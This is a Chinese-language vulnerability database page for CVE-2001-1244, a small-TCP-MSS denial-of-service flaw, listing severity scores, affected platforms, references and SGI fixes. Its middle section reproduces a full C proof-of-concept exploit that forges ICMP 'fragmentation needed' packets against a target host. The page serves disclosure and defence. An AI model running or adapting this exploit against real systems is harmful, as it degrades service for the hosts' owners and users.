CVE-2001-1244
CVSS5.0
发布时间 :2001-07-07 00:00:00
修订时间 :2008-09-05 16:26:03
NMCOES    

[原文]Multiple TCP implementations could allow remote attackers to cause a denial of service (bandwidth and CPU exhaustion) by setting the maximum segment size (MSS) to a very small number and requesting large amounts of data, which generates more packets with less TCP-level data that amplify network traffic and consume more server CPU to process.


[CNNVD]多种操作系统小TCP MSS拒绝服务漏洞(CNNVD-200107-059)

        CVE(CAN) ID: CAN-2001-1244
        
        
        
        在一些操作系统的TCP栈实现中存在一些潜在的拒绝服务问题。
        
        
        
        TCP选项中有一个MSS(最大分片大小)。TCP客户端用它来告诉对方自己每个分片的最大TCP
        
        数据长度。
        
        
        
        如果将MSS设成一个很小的数值(例如 1),然后通过一个TCP服务提交大量的请求,可能引起
        
        对方服务器产生大量的回复请求(多倍于攻击者的发送数量),这可能导致对方服务器或
        
        网络的负荷大大增加,造成拒绝服务攻击。
        
        
        
        

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: NONE [对系统的机密性无影响]
完整性影响: NONE [不会对系统完整性产生影响]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/o:microsoft:windows_nt:4.0:sp5Microsoft Windows 4.0 sp5
cpe:/o:sun:solaris:8.0
cpe:/o:linux:linux_kernel:2.4.1Linux Kernel 2.4.1
cpe:/o:microsoft:windows_nt:4.0:sp3Microsoft Windows 4.0 sp3
cpe:/o:microsoft:windows_2000:::workstation
cpe:/o:hp:hp-ux:11.00HP-UX 11.00
cpe:/o:hp:vvos:11.04HP VVOS 11.04
cpe:/o:netbsd:netbsd:1.5NetBSD 1.5
cpe:/o:microsoft:windows_nt:4.0:sp6aMicrosoft Windows 4.0 sp6a
cpe:/o:sun:solaris:2.5.1
cpe:/o:linux:linux_kernel:2.4.4Linux Kernel 2.4.4
cpe:/o:openbsd:openbsd:2.9OpenBSD 2.9
cpe:/o:microsoft:windows_nt:4.0:sp1Microsoft Windows 4.0 sp1
cpe:/o:netbsd:netbsd:1.5.1NetBSD 1.5.1
cpe:/o:microsoft:windows_nt:4.0Microsoft Windows NT 4.0
cpe:/o:microsoft:windows_nt:4.0:sp2Microsoft Windows 4.0 sp2
cpe:/o:hp:hp-ux:11.0.4HP HP-UX 11.0.4
cpe:/o:linux:linux_kernel:2.4.5Linux Kernel 2.4.5
cpe:/o:microsoft:windows_2000::sp1Microsoft windows 2000_sp1
cpe:/o:microsoft:windows_nt:4.0:sp4Microsoft Windows 4.0 sp4
cpe:/o:hp:hp-ux:11.11HP-UX 11.11
cpe:/o:microsoft:windows_2000::sp2Microsoft windows 2000_sp2
cpe:/o:freebsd:freebsd:4.3FreeBSD 4.3
cpe:/o:openbsd:openbsd:2.8OpenBSD 2.8
cpe:/o:microsoft:windows_nt:4.0:sp6Microsoft Windows 4.0 sp6
cpe:/o:sun:solaris:7.0
cpe:/o:linux:linux_kernel:2.4.0Linux Kernel 2.4.0
cpe:/o:linux:linux_kernel:2.4.2Linux Kernel 2.4.2
cpe:/o:linux:linux_kernel:2.4.3Linux Kernel 2.4.3

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1244
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2001-1244
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200107-059
(官方数据源) CNNVD

- 其它链接及资源

http://xforce.iss.net/static/6824.php
(VENDOR_ADVISORY)  XF  tcp-mss-dos(6824)
http://www.securityfocus.com/bid/2997
(VENDOR_ADVISORY)  BID  2997
http://www.securityfocus.com/archive/1/195457
(UNKNOWN)  BUGTRAQ  20010708 Small TCP packets == very large overhead == DoS?

- 漏洞信息

多种操作系统小TCP MSS拒绝服务漏洞
中危 设计错误
2001-07-07 00:00:00 2005-10-20 00:00:00
远程  
        CVE(CAN) ID: CAN-2001-1244
        
        
        
        在一些操作系统的TCP栈实现中存在一些潜在的拒绝服务问题。
        
        
        
        TCP选项中有一个MSS(最大分片大小)。TCP客户端用它来告诉对方自己每个分片的最大TCP
        
        数据长度。
        
        
        
        如果将MSS设成一个很小的数值(例如 1),然后通过一个TCP服务提交大量的请求,可能引起
        
        对方服务器产生大量的回复请求(多倍于攻击者的发送数量),这可能导致对方服务器或
        
        网络的负荷大大增加,造成拒绝服务攻击。
        
        
        
        

- 公告与补丁

        
        
        暂无

- 漏洞信息 (20997)

HP-UX 11,Linux kernel 2.4,Windows 2000/NT 4.0,IRIX 6.5 Small TCP MSS DoS (EDBID:20997)
multiple dos
2001-07-07 Verified
0 Darren Reed
N/A [点击下载]
source: http://www.securityfocus.com/bid/2997/info

A potential denial of service vulnerability exists in several TCP stack implementations.

TCP has a MSS (maximum segment size) option that is used by a TCP client to announce to a peer the maximum amount of TCP data that can be sent per segment. The potential for attacks exists because in many cases only a small minimum value is enforced for the MSS.

By setting the MSS to a low value (such as 1) and making requests for large amounts of data through a TCP service, an attacker could effectively cause a denial of service by causing a large workload on a system. 

/*
 * (C)Copyright 2001 Darren Reed.
 *
 * maxseg.c
 */
#include <sys/types.h>
#include <sys/param.h>
#include <sys/socket.h>
#if BSD >= 199306
#include <sys/sysctl.h>
#endif

#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <netinet/ip_icmp.h>
#include <netinet/ip_var.h>
#include <netinet/tcp.h>
#include <netinet/tcp_timer.h>
#include <netinet/tcp_var.h>

#include <time.h>
#include <fcntl.h>
#include <errno.h>

void prepare_icmp(struct sockaddr_in *);
void primedefaultmss(int, int);
u_short in_cksum(u_short *, int);
int icmp_unreach(struct sockaddr_in *, struct sockaddr_in *);


#define	NEW_MSS	512
#define	NEW_MTU	1500
static int start_mtu = NEW_MTU;

void primedefaultmss(fd, mss)
int fd, mss;
{
#ifdef __NetBSD__
	static int defaultmss = 0;
	int mib[4], msso, mssn;
	size_t olen;

	if (mss == 0)
		mss = defaultmss;
	mssn = mss;
	olen = sizeof(msso);

	mib[0] = CTL_NET;
	mib[1] = AF_INET;
	mib[2] = IPPROTO_TCP;
	mib[3] = TCPCTL_MSSDFLT;
	if (sysctl(mib, 4, &msso, &olen, NULL, 0))
		err(1, "sysctl");
	if (defaultmss == 0)
		defaultmss = msso;

	if (sysctl(mib, 4, 0, NULL, &mssn, sizeof(mssn)))
		err(1, "sysctl");

	if (sysctl(mib, 4, &mssn, &olen, NULL, 0))
		err(1, "sysctl");

	printf("Default MSS: old %d new %d\n", msso, mssn);
#endif

#if HACKED_KERNEL
	int opt;

	if (mss)
		op = mss;
	else
		op = 512;
	if (setsockopt(fd, IPPROTO_TCP, TCP_MAXSEG+1, (char *)&op, sizeof(op)))
		err(1, "setsockopt");
#endif
}


int
main(int argc, char *argv[])
{
	struct sockaddr_in me, them;
	int fd, op, olen, mss;
	char prebuf[16374];
	time_t now1, now2;
	struct timeval tv;

	mss = NEW_MSS;

	primedefaultmss(-1, mss);

	fd = socket(AF_INET, SOCK_STREAM, 0);
	if (fd == -1)
		err(1, "socket");

	memset((char *)&them, 0, sizeof(me));
	them.sin_family = AF_INET;
	them.sin_port = ntohs(atoi(argv[2]));
	them.sin_addr.s_addr = inet_addr(argv[1]);

	primedefaultmss(fd, mss);

	op = fcntl(fd, F_GETFL, 0);
	if (op != -1) {
		op |= O_NONBLOCK;
		fcntl(fd, F_SETFL, op);
	}

	op = 1;
	(void) setsockopt(fd, SOL_SOCKET, TCP_NODELAY, &op, sizeof(op));

	if (connect(fd, (struct sockaddr *)&them, sizeof(them)) &&
	    (errno != EINPROGRESS))
		err(1, "connect");

	olen = sizeof(op);
	if (!getsockopt(fd, IPPROTO_TCP, TCP_MAXSEG, (char *)&op, &olen))
		printf("Remote mss %d\n", op);
	else
		err(1, "getsockopt");

#if HACKED_KERNEL
	olen = sizeof(op);
	if (!getsockopt(fd, IPPROTO_TCP, TCP_MAXSEG+1, (char *)&op, &olen))
		printf("Our mss %d\n", op);
	else
		err(1, "getsockopt(+1)");
#endif

	olen = sizeof(me);
	if (getsockname(fd, (struct sockaddr *)&me, &olen))
		err(1, "getsockname");

	(void) read(fd, prebuf, sizeof(prebuf));

	now1 = time(NULL);
	for (op = 2; op; op--) {
		icmp_unreach(&me, &them);
		olen = read(fd, prebuf, sizeof(prebuf));
		if (olen == -1) {
			if (errno == ENOBUFS || errno == EAGAIN ||
			    errno == EWOULDBLOCK) {
				tv.tv_sec = 0;
				tv.tv_usec = 10000;
				select(3, NULL, NULL, NULL, &tv);
				continue;
			}
			warn("read");
			break;
		}
	}
	now2 = time(NULL);
	printf("Elapsed time %d\n", now2 - now1);

	primedefaultmss(fd, 0);
	close(fd);
	return 0;
}


/*
 * in_cksum() & icmp_unreach() ripped from nuke.c prior to modifying
 */
static char icmpbuf[256];
static int icmpsock = -1;
static struct sockaddr_in destsock;

void
prepare_icmp(dst)
	 struct sockaddr_in *dst;
{
	struct tcphdr *tcp;
	struct icmp *icmp;

	icmp = (struct icmp *)icmpbuf;

	if (icmpsock == -1) {

		memset((char *)&destsock, 0, sizeof(destsock));
		destsock.sin_family = AF_INET;
		destsock.sin_addr = dst->sin_addr;

		srand(getpid());

		icmpsock = socket(AF_INET, SOCK_RAW, IPPROTO_ICMP);
		if (icmpsock == -1)
			err(1, "socket");

		/* the following messy stuff from Adam Glass (icmpsquish.c) */
		memset(icmp, 0, sizeof(struct icmp) + 8);
		icmp->icmp_type = ICMP_UNREACH;
		icmp->icmp_code = ICMP_UNREACH_NEEDFRAG;
		icmp->icmp_pmvoid = 0;

		icmp->icmp_ip.ip_v = IPVERSION;
		icmp->icmp_ip.ip_hl = 5;
		icmp->icmp_ip.ip_len = htons(NEW_MSS);
		icmp->icmp_ip.ip_p = IPPROTO_TCP;
		icmp->icmp_ip.ip_off = htons(IP_DF);
		icmp->icmp_ip.ip_ttl = 11 + (rand() % 50);
		icmp->icmp_ip.ip_id = rand() & 0xffff;

		icmp->icmp_ip.ip_src = dst->sin_addr;

		tcp = (struct tcphdr *)(&icmp->icmp_ip + 1);
		tcp->th_sport = dst->sin_port;
	}
	icmp->icmp_nextmtu = htons(start_mtu);
	icmp->icmp_cksum = 0;
}


u_short
in_cksum(addr, len)
u_short *addr;
int len;
{
	    register int nleft = len;
	    register u_short *w = addr;
	    register int sum = 0;
	    u_short answer = 0;

	    /*
	     *  Our algorithm is simple, using a 32 bit accumulator (sum),
	     *  we add sequential 16 bit words to it, and at the end, fold
	     *  back all the carry bits from the top 16 bits into the lower
	     *  16 bits.
	     */
	    while( nleft > 1 )  {
	            sum += *w++;
	            nleft -= 2;
	    }

	    /* mop up an odd byte, if necessary */
	    if( nleft == 1 ) {
	            *(u_char *)(&answer) = *(u_char *)w ;
	            sum += answer;
	    }

	    /*
	     * add back carry outs from top 16 bits to low 16 bits
	     */
	    sum = (sum >> 16) + (sum & 0xffff);     /* add hi 16 to low 16 */
	    sum += (sum >> 16);                     /* add carry */
	    answer = ~sum;                          /* truncate to 16 bits */
	    return (answer);
}

int icmp_unreach(src, dst)
	 struct sockaddr_in *src, *dst;
{
	static int donecksum = 0;
	struct sockaddr_in dest;
	struct tcphdr *tcp;
	struct icmp *icmp;
	int i, rc;
	u_short sum;

	icmp = (struct icmp *)icmpbuf;

	prepare_icmp(dst);

	icmp->icmp_ip.ip_dst = src->sin_addr;

	sum = in_cksum((u_short *)&icmp->icmp_ip, sizeof(struct ip));
	icmp->icmp_ip.ip_sum = sum;

	tcp = (struct tcphdr *)(&icmp->icmp_ip + 1);
	tcp->th_dport = src->sin_port;

	sum = in_cksum((u_short *)icmp, sizeof(struct icmp) + 8);
	icmp->icmp_cksum = sum;
	start_mtu /= 2;
	if (start_mtu < 69)
		start_mtu = 69;

	i = sendto(icmpsock, icmpbuf, sizeof(struct icmp) + 8, 0,
		   (struct sockaddr *)&destsock, sizeof(destsock));
	if (i == -1 && errno != ENOBUFS && errno != EAGAIN &&
	    errno != EWOULDBLOCK)
		err(1, "sendto");
	return(0);
}
		

- 漏洞信息

10385
Multiple TCP Implementation Mismatched MSS Remote DoS
Remote / Network Access Denial of Service
Loss of Availability
Exploit Public

- 漏洞描述

- 时间线

2001-07-07 Unknow
2001-07-07 Unknow

- 解决方案

Products

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

Multiple Vendor Small TCP MSS Denial of Service Vulnerability
Design Error 2997
Yes No
2001-07-07 12:00:00 2009-07-11 06:56:00
Reported by Darren Reed <avalon@coombs.anu.edu.au> on July 7, 2001.

- 受影响的程序版本

Sun Solaris 2.5.1
Sun Solaris 8_sparc
Sun Solaris 7.0
SGI IRIX 6.5.18 m
SGI IRIX 6.5.18 f
SGI IRIX 6.5.17 m
SGI IRIX 6.5.17 f
SGI IRIX 6.5.16 m
SGI IRIX 6.5.16 f
SGI IRIX 6.5.15 m
SGI IRIX 6.5.15 f
SGI IRIX 6.5.14 m
SGI IRIX 6.5.14 f
SGI IRIX 6.5.13
SGI IRIX 6.5.12
SGI IRIX 6.5.11
SGI IRIX 6.5.10
SGI IRIX 6.5.9
SGI IRIX 6.5.8
SGI IRIX 6.5.7
SGI IRIX 6.5.6
SGI IRIX 6.5.5
SGI IRIX 6.5.4
SGI IRIX 6.5.3
SGI IRIX 6.5.2
SGI IRIX 6.5.1
SGI IRIX 6.5
OpenBSD OpenBSD 2.9
OpenBSD OpenBSD 2.8
NetBSD NetBSD 1.5.1
NetBSD NetBSD 1.5
Microsoft Windows NT Workstation 4.0 SP6a
Microsoft Windows NT Workstation 4.0 SP6
Microsoft Windows NT Workstation 4.0 SP5
Microsoft Windows NT Workstation 4.0 SP4
Microsoft Windows NT Workstation 4.0 SP3
Microsoft Windows NT Workstation 4.0 SP2
Microsoft Windows NT Workstation 4.0 SP1
Microsoft Windows NT Workstation 4.0
Microsoft Windows NT Terminal Server 4.0 SP6
Microsoft Windows NT Terminal Server 4.0 SP5
Microsoft Windows NT Terminal Server 4.0 SP4
Microsoft Windows NT Terminal Server 4.0 SP3
Microsoft Windows NT Terminal Server 4.0 SP2
Microsoft Windows NT Terminal Server 4.0 SP1
Microsoft Windows NT Terminal Server 4.0
Microsoft Windows NT Server 4.0 SP6a
+ Avaya DefinityOne Media Servers
+ Avaya DefinityOne Media Servers
+ Avaya IP600 Media Servers
+ Avaya IP600 Media Servers
+ Avaya S3400 Message Application Server 0
+ Avaya S8100 Media Servers 0
+ Avaya S8100 Media Servers 0
Microsoft Windows NT Server 4.0 SP6
Microsoft Windows NT Server 4.0 SP5
Microsoft Windows NT Server 4.0 SP4
Microsoft Windows NT Server 4.0 SP3
Microsoft Windows NT Server 4.0 SP2
Microsoft Windows NT Server 4.0 SP1
Microsoft Windows NT Server 4.0
Microsoft Windows NT Enterprise Server 4.0 SP6a
Microsoft Windows NT Enterprise Server 4.0 SP6
Microsoft Windows NT Enterprise Server 4.0 SP5
Microsoft Windows NT Enterprise Server 4.0 SP4
Microsoft Windows NT Enterprise Server 4.0 SP3
Microsoft Windows NT Enterprise Server 4.0 SP2
Microsoft Windows NT Enterprise Server 4.0 SP1
Microsoft Windows NT Enterprise Server 4.0
Microsoft Windows NT 4.0 SP6a
+ Microsoft Windows NT Enterprise Server 4.0 SP6a
+ Microsoft Windows NT Enterprise Server 4.0 SP6a
+ Microsoft Windows NT Server 4.0 SP6a
+ Microsoft Windows NT Server 4.0 SP6a
+ Microsoft Windows NT Terminal Server 4.0 SP6a
+ Microsoft Windows NT Workstation 4.0 SP6a
+ Microsoft Windows NT Workstation 4.0 SP6a
Microsoft Windows NT 4.0 SP6
+ Microsoft Windows NT Enterprise Server 4.0 SP6
+ Microsoft Windows NT Enterprise Server 4.0 SP6
+ Microsoft Windows NT Server 4.0 SP6
+ Microsoft Windows NT Server 4.0 SP6
+ Microsoft Windows NT Terminal Server 4.0 SP6
+ Microsoft Windows NT Terminal Server 4.0 SP6
+ Microsoft Windows NT Workstation 4.0 SP6
+ Microsoft Windows NT Workstation 4.0 SP6
Microsoft Windows NT 4.0 SP5
+ Microsoft Windows NT Enterprise Server 4.0 SP5
+ Microsoft Windows NT Enterprise Server 4.0 SP5
+ Microsoft Windows NT Server 4.0 SP5
+ Microsoft Windows NT Server 4.0 SP5
+ Microsoft Windows NT Terminal Server 4.0 SP5
+ Microsoft Windows NT Terminal Server 4.0 SP5
+ Microsoft Windows NT Workstation 4.0 SP5
+ Microsoft Windows NT Workstation 4.0 SP5
Microsoft Windows NT 4.0 SP4
+ Microsoft Windows NT Enterprise Server 4.0 SP4
+ Microsoft Windows NT Enterprise Server 4.0 SP4
+ Microsoft Windows NT Server 4.0 SP4
+ Microsoft Windows NT Server 4.0 SP4
+ Microsoft Windows NT Terminal Server 4.0 SP4
+ Microsoft Windows NT Terminal Server 4.0 SP4
+ Microsoft Windows NT Workstation 4.0 SP4
+ Microsoft Windows NT Workstation 4.0 SP4
Microsoft Windows NT 4.0 SP3
+ Microsoft Windows NT Enterprise Server 4.0 SP3
+ Microsoft Windows NT Enterprise Server 4.0 SP3
+ Microsoft Windows NT Server 4.0 SP3
+ Microsoft Windows NT Server 4.0 SP3
+ Microsoft Windows NT Terminal Server 4.0 SP3
+ Microsoft Windows NT Terminal Server 4.0 SP3
+ Microsoft Windows NT Workstation 4.0 SP3
+ Microsoft Windows NT Workstation 4.0 SP3
Microsoft Windows NT 4.0 SP2
+ Microsoft Windows NT Enterprise Server 4.0 SP2
+ Microsoft Windows NT Enterprise Server 4.0 SP2
+ Microsoft Windows NT Server 4.0 SP2
+ Microsoft Windows NT Server 4.0 SP2
+ Microsoft Windows NT Terminal Server 4.0 SP2
+ Microsoft Windows NT Terminal Server 4.0 SP2
+ Microsoft Windows NT Workstation 4.0 SP2
+ Microsoft Windows NT Workstation 4.0 SP2
Microsoft Windows NT 4.0 SP1
+ Microsoft Windows NT Enterprise Server 4.0 SP1
+ Microsoft Windows NT Enterprise Server 4.0 SP1
+ Microsoft Windows NT Server 4.0 SP1
+ Microsoft Windows NT Server 4.0 SP1
+ Microsoft Windows NT Terminal Server 4.0 SP1
+ Microsoft Windows NT Terminal Server 4.0 SP1
+ Microsoft Windows NT Workstation 4.0 SP1
+ Microsoft Windows NT Workstation 4.0 SP1
Microsoft Windows NT 4.0
+ Microsoft Windows NT Enterprise Server 4.0
+ Microsoft Windows NT Enterprise Server 4.0
+ Microsoft Windows NT Server 4.0
+ Microsoft Windows NT Server 4.0
+ Microsoft Windows NT Terminal Server 4.0
+ Microsoft Windows NT Terminal Server 4.0
+ Microsoft Windows NT Workstation 4.0
+ Microsoft Windows NT Workstation 4.0
Microsoft Windows 2000 Terminal Services SP2
+ Microsoft Windows 2000 Advanced Server SP2
+ Microsoft Windows 2000 Datacenter Server SP2
+ Microsoft Windows 2000 Server SP2
Microsoft Windows 2000 Terminal Services SP1
+ Microsoft Windows 2000 Advanced Server SP1
+ Microsoft Windows 2000 Datacenter Server SP1
+ Microsoft Windows 2000 Server SP1
Microsoft Windows 2000 Terminal Services
+ Microsoft Windows 2000 Advanced Server
+ Microsoft Windows 2000 Datacenter Server
+ Microsoft Windows 2000 Server
Microsoft Windows 2000 Server SP2
Microsoft Windows 2000 Server SP1
Microsoft Windows 2000 Server
+ Avaya DefinityOne Media Servers
+ Avaya IP600 Media Servers
+ Avaya S3400 Message Application Server 0
+ Avaya S8100 Media Servers 0
Microsoft Windows 2000 Professional SP2
Microsoft Windows 2000 Professional SP1
Microsoft Windows 2000 Professional
Microsoft Windows 2000 Datacenter Server SP2
Microsoft Windows 2000 Datacenter Server SP1
Microsoft Windows 2000 Datacenter Server
Microsoft Windows 2000 Advanced Server SP2
Microsoft Windows 2000 Advanced Server SP1
Microsoft Windows 2000 Advanced Server
Linux kernel 2.4.5
+ Slackware Linux 8.0
Linux kernel 2.4.4
+ S.u.S.E. Linux 7.2
Linux kernel 2.4.3
+ Mandriva Linux Mandrake 8.0 ppc
+ Mandriva Linux Mandrake 8.0
Linux kernel 2.4.2
+ Caldera OpenLinux Server 3.1
+ Caldera OpenLinux Workstation 3.1
+ RedHat Linux 7.1 i386
+ RedHat Linux 7.1 alpha
Linux kernel 2.4.1
Linux kernel 2.4
HP HP-UX (VVOS) 11.0.4
HP HP-UX 11.11
HP HP-UX 11.0 4
HP HP-UX 11.0
FreeBSD FreeBSD 4.3
SGI IRIX 6.5.19

- 不受影响的程序版本

SGI IRIX 6.5.19

- 漏洞讨论

A potential denial of service vulnerability exists in several TCP stack implementations.

TCP has a MSS (maximum segment size) option that is used by a TCP client to announce to a peer the maximum amount of TCP data that can be sent per segment. The potential for attacks exists because in many cases only a small minimum value is enforced for the MSS.

By setting the MSS to a low value (such as 1) and making requests for large amounts of data through a TCP service, an attacker could effectively cause a denial of service by causing a large workload on a system.

- 漏洞利用

An example exploit has been provided by Darren Reed &lt;avalon@coombs.anu.edu.au&gt;:

- 解决方案

SGI has released an advisory. Users are advised to upgrade to IRIX 6.5.19 or to apply the following fixes.

The following fixes are available:


SGI IRIX 6.5.14 f

SGI IRIX 6.5.14 m

SGI IRIX 6.5.15 m

SGI IRIX 6.5.15 f

SGI IRIX 6.5.16 f

SGI IRIX 6.5.16 m

SGI IRIX 6.5.17 m

SGI IRIX 6.5.17 f

SGI IRIX 6.5.18 m

SGI IRIX 6.5.18 f

- 相关参考

     

     

    关于SCAP中文社区

    SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

    版权声明

    CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站